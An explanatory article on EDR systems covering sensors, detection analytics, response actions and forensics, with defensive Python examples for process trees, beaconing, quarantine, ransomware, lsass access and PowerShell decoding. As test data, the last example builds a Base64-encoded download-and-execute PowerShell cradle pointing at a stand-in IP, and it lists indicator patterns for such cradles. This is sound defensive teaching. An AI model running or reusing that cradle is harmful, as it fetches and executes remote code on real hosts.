# How EDR Works: Sensors, Telemetry, Detection, and Response
This article explains the pipeline from endpoint telemetry to detection to response, covering how EDR systems collect data, analyze threats, and execute automated responses.
## Endpoint Agent Telemetry
EDR agents (sensors) run on every endpoint and continuously collect telemetry from kernel and OS event sources (on Windows typically kernel callbacks, file-system and network filter drivers and ETW; on Linux eBPF or the audit subsystem), across the following data categories:
### Process Monitoring
- **Process creation/termination**: Full command line arguments, parent-child relationships
- **Process genealogy**: Complete execution chains and process trees
- **Memory analysis**: Runtime behavior, injection detection, loaded modules
- **Process privileges**: Elevation attempts, token manipulation
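The process-genealogy data above is what lets an analyst ask "what launched this?" rather than just "what ran?". The following is an added example (written for this article, not code from any EDR product) that rebuilds a process tree from process-creation records and flags the classic macro-dropper pattern of an Office application spawning a shell. The event fields (pid, ppid, image, cmdline) are an assumption modelled on Sysmon Event ID 1 style records, and the sample events are constructed.

```python
"""Process genealogy from process-creation telemetry.

Added example for this article, not code from any EDR vendor.  The event
fields (pid, ppid, image, cmdline) are an assumption modelled on Sysmon
Event ID 1 style process-start records; the sample events are constructed.
"""
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # basename of the executable, lower-cased
    cmdline: str


# Parents that should almost never launch a shell or script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
          "cscript.exe", "mshta.exe"}


def build_tree(events):
    """Index events by pid and collect child pids per parent."""
    by_pid = {e.pid: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e.pid)
    return by_pid, children


def ancestry(by_pid, pid):
    """Image names from the root of the tree down to pid.  The `seen`
    set guards against pid reuse producing a cycle in stale telemetry."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return chain[::-1]


def office_spawned_shell(by_pid):
    """Pids of shell/script-host processes whose direct parent is an
    Office application (a classic macro-dropper pattern)."""
    hits = []
    for e in by_pid.values():
        parent = by_pid.get(e.ppid)
        if parent and parent.image in OFFICE_PARENTS and e.image in SHELLS:
            hits.append(e.pid)
    return sorted(hits)


# Constructed sample telemetry; pids and paths are made up.
SAMPLE = [
    ProcEvent(4, 0, "system", ""),
    ProcEvent(600, 4, "services.exe", r"C:\Windows\System32\services.exe"),
    ProcEvent(1200, 600, "explorer.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(2000, 1200, "chrome.exe", r"C:\Program Files\Google\Chrome\chrome.exe"),
    ProcEvent(3100, 1200, "winword.exe", r"WINWORD.EXE /n C:\Users\alice\Downloads\invoice.docm"),
    ProcEvent(3150, 3100, "cmd.exe", "cmd.exe /c powershell -nop -w hidden -c whoami"),
    ProcEvent(3160, 3150, "powershell.exe", "powershell -nop -w hidden -c whoami"),
]

if __name__ == "__main__":
    by_pid, children = build_tree(SAMPLE)
    for pid in office_spawned_shell(by_pid):
        print(pid, " -> ".join(ancestry(by_pid, pid)))
```

Run as a script it prints `3150 system -> services.exe -> explorer.exe -> winword.exe -> cmd.exe`. Real agents key the tree on a process GUID rather than the pid alone, because pids are reused; the `seen` guard is the minimum you need if only pids are available.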
### File System Activity
- **File operations**: Create, read, write, delete, move, rename operations
- **File metadata**: Hashes (SHA256 as the primary key; MD5 and SHA1 retained for matching older IOC feeds), digital signatures, version info
- **Execution events**: Binary launches, DLL loads, script execution
- **Ransomware indicators**: Mass file modification and renames to a new extension, high-entropy writes, shadow copy deletion
### Network Communications
- **Connection details**: Source/destination IPs, ports, protocols
- **DNS queries**: Domain resolutions, suspicious TLD patterns
- **Network flows**: Data volumes, connection durations, beacon analysis
- **Protocol analysis**: HTTP headers for cleartext traffic; for TLS, only what is visible without interception (SNI, server certificate, JA3-style client fingerprints) unless the agent hooks the local TLS library or a proxy terminates the session
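The "beacon analysis" item above is worth making concrete, because it is one of the few network detections an agent can run on connection metadata alone. Below is an added example, written for this article rather than taken from any product, that scores each destination by how regular the gaps between connections are: a C2 implant on a fixed sleep produces near-constant intervals, ordinary browsing does not. The thresholds (`min_conns`, `max_cv`) and the flow records are assumptions constructed for the example.

```python
"""Beacon analysis over connection telemetry.

Added example, not vendor code.  Scores each destination by how regular
its inter-connection intervals are; thresholds are assumptions and the
flow records are constructed.
"""
from collections import defaultdict
from itertools import accumulate
from statistics import mean, pstdev


def beacon_scores(flows, min_conns=8):
    """flows: iterable of (timestamp_seconds, destination).
    Returns {dst: (count, mean_interval, coefficient_of_variation)} for
    destinations with at least min_conns connections.  A low coefficient
    of variation means the intervals are nearly constant."""
    times = defaultdict(list)
    for ts, dst in flows:
        times[dst].append(ts)
    scores = {}
    for dst, ts in times.items():
        if len(ts) < min_conns:
            continue
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg > 0 else 0.0
        scores[dst] = (len(ts), avg, cv)
    return scores


def likely_beacons(flows, max_cv=0.15, min_conns=8):
    """Destinations whose interval jitter is below max_cv."""
    return sorted(dst for dst, (_, _, cv) in beacon_scores(flows, min_conns).items()
                  if cv <= max_cv)


def _flows_from_gaps(dst, start, gaps):
    """Expand a start time plus inter-arrival gaps into (ts, dst) records."""
    return [(t, dst) for t in accumulate([start] + list(gaps))]


# Constructed sample: an implant checking in every ~60 s with small
# jitter, a browser hitting a site at irregular gaps, and a host seen
# too rarely to score.
SAMPLE_FLOWS = (
    _flows_from_gaps("203.0.113.7", 0, [60, 58, 62, 61, 59, 60, 57, 63, 60])
    + _flows_from_gaps("198.51.100.34", 5, [5, 120, 3, 900, 40, 2, 300, 15, 7])
    + _flows_from_gaps("192.0.2.9", 30, [400, 1200])
)

if __name__ == "__main__":
    for dst, (n, avg, cv) in sorted(beacon_scores(SAMPLE_FLOWS).items()):
        print(f"{dst:15} n={n} mean={avg:.1f}s cv={cv:.3f}")
    print("likely beacons:", likely_beacons(SAMPLE_FLOWS))
```

Implants commonly add deliberate jitter (often 10 to 30 percent of the sleep) precisely to defeat a bare interval test, so production engines combine this with payload-size regularity, long-lived low-volume sessions and the destination's reputation rather than alerting on the coefficient of variation alone.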
### Registry Monitoring
- **Registry modifications**: Key creation, value changes, deletions
- **Persistence mechanisms**: Startup entries, service installations
- **System configuration**: Security settings modifications
- **Malware artifacts**: Common persistence and configuration entries
### User Behavior Analysis
- **Authentication events**: Logon/logoff, failed attempts, privilege escalation
- **User activity**: File access patterns, application usage
- **Lateral movement**: Network authentication, remote access attempts
- **Anomalous behavior**: Off-hours activity, unusual access patterns
## Analytics: Detections, Behavior, Rules, and Machine Learning
### Behavioral Analysis Engine
- **Baseline establishment**: Normal system and user behavior patterns
- **Anomaly detection**: Deviations from established baselines
- **Attack technique mapping**: MITRE ATT&CK framework correlation
- **Context correlation**: Multi-event analysis for complex attack chains
### Rule-Based Detection
- **Signature matching**: Known malware families and variants
- **YARA rules**: Pattern matching for malicious code structures
- **IOC matching**: Hash, IP, domain, and file path indicators
- **Behavioral rules**: Suspicious activity pattern detection
### Machine Learning Models
- **Supervised learning**: Trained on labeled malicious and benign samples
- **Unsupervised learning**: Clustering and outlier scoring without labels, to surface activity that matches no known family
- **Neural networks**: Deep models over raw inputs (byte sequences, command lines, ordered process behaviour) where hand-engineered features are insufficient
- **Model updates**: Continuous learning from global threat intelligence
### Cloud Intelligence Integration
- **Threat intelligence feeds**: Real-time IOC updates from security vendors
- **Global visibility**: Cross-customer attack pattern analysis
- **Sandbox analysis**: Automated malware behavior analysis
- **Reputation services**: File, IP, and domain reputation scoring
## Response Actions: Isolate, Kill, Quarantine, and Rollback
### Network Isolation
- **Host containment**: Block all network communications except management traffic; the agent's own channel to the EDR backend must survive, which is why isolation is enforced by the agent's network filter on the host rather than by an upstream firewall that would also cut that channel
- **Granular isolation**: Block specific processes or applications
- **Temporary quarantine**: Time-limited isolation with automatic release
- **Investigation preservation**: Maintain forensic access during isolation
### Process Termination
- **Malicious process killing**: Immediate termination of confirmed threats
- **Process tree termination**: Kill parent and all child processes
- **Service disruption**: Stop malicious services and scheduled tasks
- **Memory dumping**: Capture process memory before termination for analysis
### File Quarantine and Remediation
- **File quarantine**: Move suspicious files to secure storage
- **Hash-based blocking**: Prevent execution of known malicious files
- **Digital signature validation**: Verify code signatures (Authenticode on Windows) and, where policy allows, block unsigned binaries; a valid signature is not proof of safety, since stolen or abused signing certificates and signed-but-vulnerable drivers are routinely used by attackers
- **Whitelist enforcement**: Allow only approved applications to execute
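Quarantine and hash-based blocking work together: once a file is pulled into quarantine, its hash is what stops a second copy elsewhere on the host from running. The following added example (written for this article; the quarantine layout, sidecar manifest and in-memory blocklist are assumptions, not any vendor's format) shows both steps over constructed files in a temporary directory.

```python
"""File quarantine plus hash-based execution blocking.

Added example, not a vendor's implementation.  The quarantine directory
layout, sidecar manifest and in-memory blocklist are assumptions; the
sample files are constructed inside a temporary directory.
"""
import hashlib
import json
import os
import shutil
import tempfile
import time


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def quarantine(path, qdir, blocklist):
    """Move `path` into `qdir` named by its SHA-256 with a .quar suffix so
    nothing treats it as executable, restrict it to the owner, write a JSON
    sidecar recording where it came from, and add the hash to the
    blocklist.  Returns the hash."""
    digest = sha256_of(path)
    original = os.path.abspath(path)
    os.makedirs(qdir, mode=0o700, exist_ok=True)
    dest = os.path.join(qdir, digest + ".quar")
    shutil.move(path, dest)
    os.chmod(dest, 0o600)
    meta = {"sha256": digest, "original_path": original,
            "size": os.path.getsize(dest), "quarantined_at": time.time()}
    with open(dest + ".json", "w") as f:
        json.dump(meta, f)
    blocklist.add(digest)
    return digest


def execution_allowed(path, blocklist):
    """Hash check an agent would run before permitting an execution.  A
    second copy of a quarantined file, wherever it lives, is blocked."""
    return sha256_of(path) not in blocklist


def demo():
    """Build constructed files in a temp dir, quarantine one, and report
    what the block check says about its sibling copy and a benign file."""
    with tempfile.TemporaryDirectory() as tmp:
        payload = b"MZ" + b"\x90" * 64        # constructed stand-in, not malware
        bad = os.path.join(tmp, "Downloads", "invoice.exe")
        copy = os.path.join(tmp, "Temp", "invoice(1).exe")
        good = os.path.join(tmp, "notepad.exe")
        for p, data in ((bad, payload), (copy, payload), (good, b"MZ benign")):
            os.makedirs(os.path.dirname(p), exist_ok=True)
            with open(p, "wb") as f:
                f.write(data)
        blocklist = set()
        qdir = os.path.join(tmp, "Quarantine")
        digest = quarantine(bad, qdir, blocklist)
        return {
            "digest": digest,
            "original_removed": not os.path.exists(bad),
            "stored": os.path.exists(os.path.join(qdir, digest + ".quar")),
            "manifest": os.path.exists(os.path.join(qdir, digest + ".quar.json")),
            "copy_allowed": execution_allowed(copy, blocklist),
            "benign_allowed": execution_allowed(good, blocklist),
        }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Production agents additionally encrypt or XOR the quarantined bytes so that on-access scanners and backup jobs do not re-detect or re-spread the file, and they keep the manifest so the file can be restored if the verdict turns out to be a false positive.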
### System Rollback Capabilities
- **File system rollback**: Restore files to their pre-infection state from agent-maintained copies or Volume Shadow Copies; ransomware routinely deletes shadow copies (for example with vssadmin) before encrypting, so copies the agent protects from tampering are what make rollback dependable
- **Registry restoration**: Revert system configuration changes
- **Snapshot management**: Create and restore system snapshots
- **Backup validation**: Ensure rollback targets are clean
## Example Detection Flows
### Ransomware Detection and Response
1. **Initial indicators**: Mass file encryption detected
2. **Process analysis**: Identify ransomware executable and process tree
3. **Network blocking**: Isolate host to prevent lateral spread
4. **Process termination**: Kill ransomware processes immediately
5. **File recovery**: Initiate rollback of encrypted files from backup
6. **Threat analysis**: Extract IOCs and update detection rules
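Step 1 of this flow, "mass file encryption detected", is a rate-based behavioural rule rather than a signature. The following added example (written for this article, not taken from any product) implements it over file-operation telemetry: a process that renames many files to a new extension across several directories within a short window trips the alert, while a build tool doing the same thing slowly in one directory does not. The window, thresholds and event records are assumptions, and the events are constructed.

```python
"""Mass-encryption detection over file-system telemetry.

Added example, not vendor code.  Flags a process that, inside a short
window, renames many files to a new extension across several
directories.  Window, thresholds and the event records are assumptions
modelled on file-operation telemetry; the events are constructed.
"""
from collections import defaultdict, deque
import ntpath


def _ext(path):
    return ntpath.splitext(path)[1].lower()


def detect_mass_encryption(events, window=10.0, threshold=20, min_dirs=2):
    """events: (ts, pid, op, path, new_path) in time order; op is one of
    "write", "rename", "delete"; new_path is None unless op == "rename".
    Only renames that change the extension count.  Returns
    {pid: (first_ts_in_burst, new_extension)} for each pid that crossed
    the threshold."""
    recent = defaultdict(deque)       # pid -> deque of (ts, directory, new_ext)
    alerts = {}
    for ts, pid, op, path, new_path in events:
        if op != "rename" or _ext(new_path) == _ext(path):
            continue
        q = recent[pid]
        q.append((ts, ntpath.dirname(path), _ext(new_path)))
        while ts - q[0][0] > window:          # slide the window
            q.popleft()
        dirs = {d for _, d, _ in q}
        if len(q) >= threshold and len(dirs) >= min_dirs and pid not in alerts:
            alerts[pid] = (q[0][0], _ext(new_path))
    return alerts


def _sample_events():
    ev = []
    # pid 4242: 25 renames to .locked in 5 s across two user folders.
    dirs = [r"C:\Users\alice\Documents", r"C:\Users\alice\Pictures"]
    for i in range(25):
        src = ntpath.join(dirs[i % 2], f"file{i}" + (".docx" if i % 2 == 0 else ".jpg"))
        ev.append((100.0 + 0.2 * i, 4242, "rename", src, src + ".locked"))
    # pid 1500: a build tool renaming .tmp -> .o, 30 s apart, one directory.
    for i in range(30):
        ev.append((50.0 + 30.0 * i, 1500, "rename",
                   rf"C:\build\obj{i}.tmp", rf"C:\build\obj{i}.o"))
    # pid 900: ordinary document edits.
    ev.append((120.0, 900, "write", r"C:\Users\alice\notes.txt", None))
    ev.append((121.0, 900, "rename", r"C:\Users\alice\draft.docx", r"C:\Users\alice\final.docx"))
    return sorted(ev, key=lambda e: e[0])


SAMPLE_EVENTS = _sample_events()

if __name__ == "__main__":
    for pid, (start, new_ext) in detect_mass_encryption(SAMPLE_EVENTS).items():
        print(f"pid {pid}: mass rename to {new_ext} starting at t={start}")
```

In an agent this rule would be wired to the process-tree kill and host-isolation actions described above; many products also plant canary files that no legitimate process should touch, which fires earlier than a rate threshold does.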
### Credential Theft Investigation
1. **Suspicious activity**: A process opens a handle to lsass.exe with memory-read rights (Sysmon Event ID 10 / ProcessAccess, or the agent's equivalent kernel object callback)
2. **Process investigation**: Analyze accessing process and parent chain
3. **User correlation**: Check for unusual authentication patterns
4. **Network analysis**: Monitor for lateral movement attempts
5. **Credential reset**: Force password changes for affected accounts
6. **Continuous monitoring**: Enhanced surveillance for compromised credentials
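Steps 1 and 2 of this flow turn on reading the access mask and the caller's identity correctly: benign software opens lsass.exe with query-only rights all day, so the alert has to key on memory-read rights from an unexpected source. The following added example (written for this article, not vendor code) triages constructed process-access events laid out like Sysmon Event ID 10; the allowlist and severity scheme are assumptions.

```python
"""Triage of process-access telemetry against lsass.exe.

Added example, not vendor code.  Event fields follow Sysmon Event ID 10
(ProcessAccess): SourceImage, TargetImage, GrantedAccess as a hex string,
CallTrace.  The allowlist and severity scheme are assumptions; the events
are constructed.
"""
# Windows process access rights (winnt.h values).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_DUP_HANDLE = 0x0040
RIGHT_NAMES = {
    PROCESS_CREATE_THREAD: "PROCESS_CREATE_THREAD",
    PROCESS_VM_READ: "PROCESS_VM_READ",
    PROCESS_VM_WRITE: "PROCESS_VM_WRITE",
    PROCESS_DUP_HANDLE: "PROCESS_DUP_HANDLE",
}
# Rights that let a caller read or tamper with LSASS memory.  Query-only
# handles (0x1000, 0x1400) are requested constantly by benign software.
CREDENTIAL_THEFT_MASK = sum(RIGHT_NAMES)

# Hypothetical allowlist of sources expected to touch LSASS; in production
# it is built from the fleet's baseline and keyed on signer as well as path.
ALLOWED_SOURCES = {
    "c:\\windows\\system32\\csrss.exe",
    "c:\\windows\\system32\\wininit.exe",
    "c:\\programdata\\microsoft\\windows defender\\platform\\msmpeng.exe",
}


def evaluate_process_access(ev):
    """Return None if the event is uninteresting, else (severity, reasons)."""
    if not ev["TargetImage"].lower().endswith("\\lsass.exe"):
        return None
    granted = int(ev["GrantedAccess"], 16)
    rights = [name for bit, name in RIGHT_NAMES.items() if granted & bit]
    if not rights:
        return None
    source = ev["SourceImage"].lower()
    if source in ALLOWED_SOURCES:
        return None
    reasons = list(rights)
    severity = "high" if granted & PROCESS_VM_READ else "medium"
    # Sysmon writes UNKNOWN(<address>) for frames in unbacked memory: a strong
    # sign that injected or reflectively loaded code is driving the access.
    if "unknown(" in ev.get("CallTrace", "").lower():
        severity = "critical"
        reasons.append("call stack contains unbacked memory")
    if source.startswith("c:\\users\\"):
        reasons.append("source runs from a user-writable path")
    return severity, reasons


# Constructed events; paths, masks and addresses are made up for the example.
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Windows\System32\KERNELBASE.dll+2bb3e"},
    {"SourceImage": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234|UNKNOWN(000001E5B7E4A0F3)"},
    {"SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1400",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234"},
    {"SourceImage": r"C:\Tools\dumper.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Tools\dumper.exe+1a2b"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\services.exe", "GrantedAccess": "0x1FFFFF",
     "CallTrace": ""},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["SourceImage"], "->", evaluate_process_access(ev))
```

Keying the allowlist on path alone is the weak point: an attacker who can write to a path that is allowlisted, or who injects into an allowlisted process, passes the check, which is why the call-stack test and the signer of the source image matter as much as the image path.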
### Living-off-the-Land Attack
1. **PowerShell execution**: Command line carries -EncodedCommand (or an abbreviation such as -enc or -e) with a Base64 blob, typically alongside -NoProfile and -WindowStyle Hidden
2. **Behavioral analysis**: Unusual PowerShell usage pattern identified
3. **Command decoding**: Base64-decode the blob as UTF-16LE to reveal the script (often a download cradle or in-memory loader); nested encodings may need repeated decoding
4. **Network correlation**: Check for command-and-control communications
5. **Response orchestration**: Block C2 domains, isolate host, kill processes
6. **Attribution**: Link to known threat actor TTPs and campaigns
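Steps 1, 3 and 4 of this flow (spot the encoded flag, decode, pull out C2 candidates) are mechanical enough to show end to end. The following is an added example written for this article, not code from any product: it decodes an -EncodedCommand blob (Base64 over UTF-16LE), scores the outer and decoded command lines against a small indicator list, and extracts URLs for network correlation. The flag regex, indicator list and scoring are assumptions, and the sample command lines are constructed (the encoded payload is built from a plain-text cradle when the module loads).

```python
"""Decoding and scoring a PowerShell encoded command line.

Added example, not vendor code.  The flag regex, indicator list and
scoring are assumptions; the sample command lines are constructed here
(the encoded payload is built from a plain-text cradle at import time).
"""
import base64
import re

# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -en,
# -enc).  The blob is Base64 of the UTF-16LE script text.
ENC_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)

# Indicator name -> pattern searched across the outer command line and the
# decoded script.
INDICATORS = {
    "invoke-expression": r"\biex\b|invoke-expression",
    "download cradle": r"downloadstring|downloadfile|invoke-webrequest|net\.webclient",
    "base64 staging": r"frombase64string",
    "no profile": r"-nop\b|-noprofile",
    "hidden window": r"-w(?:indowstyle)?\s+hidden",
    "execution policy bypass": r"-e(?:p|xecutionpolicy)\s+bypass",
    "in-memory assembly load": r"reflection\.assembly",
}


def decode_encoded_command(cmdline):
    """Return the decoded script text, or None if there is no (valid)
    encoded command."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Decode, extract candidate C2 URLs, and score the command line."""
    decoded = decode_encoded_command(cmdline)
    text = (cmdline + " " + (decoded or "")).lower()
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, text)]
    urls = URL_RE.findall(decoded or "")
    return {"decoded": decoded, "indicators": hits, "urls": urls,
            "score": len(hits) + 2 * len(urls)}


# Constructed samples.  The cradle and URL are made up for the example.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_MALICIOUS = f"powershell.exe -nop -w hidden -enc {ENCODED}"
SAMPLE_BENIGN = 'powershell.exe -Command "Get-Service | Where-Object Status -eq Running"'

if __name__ == "__main__":
    for line in (SAMPLE_MALICIOUS, SAMPLE_BENIGN):
        print(analyze(line))
```

Command-line decoding is a first pass only: scripts that build their real payload with string concatenation, -join, or a FromBase64String stage inside the decoded text need the decoded script itself to be re-run through the same analysis, and PowerShell Script Block Logging (Event ID 4104) captures what actually executed regardless of how the command line was obfuscated.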
## Data Retention and Forensic Value
### Data Storage Strategy
- **Hot storage**: Recent 30-90 days for real-time analysis
- **Warm storage**: 6-12 months for threat hunting and investigations
- **Cold storage**: Long-term retention for compliance and historical analysis
- **Data compression**: Efficient storage of large telemetry volumes
### Forensic Capabilities
- **Timeline reconstruction**: Chronological view of attack progression
- **Evidence preservation**: Immutable audit trails for legal proceedings
- **Chain of custody**: Documented evidence handling procedures
- **Expert witness support**: Technical testimony and report generation
### Search and Analysis Features
- **Full-text search**: Query across all collected telemetry
- **Time-based filtering**: Focus analysis on specific time windows
- **Cross-system correlation**: Link events across multiple endpoints
- **Threat hunting queries**: Proactive search for indicators of compromise
### Compliance and Reporting
- **Regulatory requirements**: Meet retention and deletion obligations; HIPAA and SOX set minimum retention periods for security records, while GDPR's storage-limitation principle caps how long personal data inside telemetry (usernames, IP addresses) may be kept
- **Incident documentation**: Comprehensive breach response reports
- **Metrics and KPIs**: Dwell time, detection rates, response times
- **Executive dashboards**: High-level security posture visibility
## Integration with Security Ecosystem
### SIEM Integration
- **Log forwarding**: Stream EDR events to central SIEM platform
- **Alert enrichment**: Add endpoint context to security events
- **Correlation rules**: Cross-reference EDR data with other security tools
- **Automated workflows**: Trigger SOAR playbooks from EDR detections
### Threat Intelligence Platforms
- **IOC enrichment**: Add context to indicators from multiple sources
- **Attribution data**: Link attacks to known threat actors and campaigns
- **TTPs mapping**: Correlate observed techniques with MITRE ATT&CK
- **Predictive analysis**: Anticipate future attack vectors based on trends